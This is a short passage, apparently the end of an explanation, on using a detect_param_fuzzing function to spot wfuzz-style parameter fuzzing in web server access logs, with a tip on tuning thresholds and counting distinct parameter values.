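Feed it a real access log (`detect_param_fuzzing(open("access.log"))`) and tune the two thresholds to your traffic; the second wfuzz run, which cycles values of one parameter rather than names, is better caught by counting distinct values for a fixed name, which is a one-line change to what is appended to `events`.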




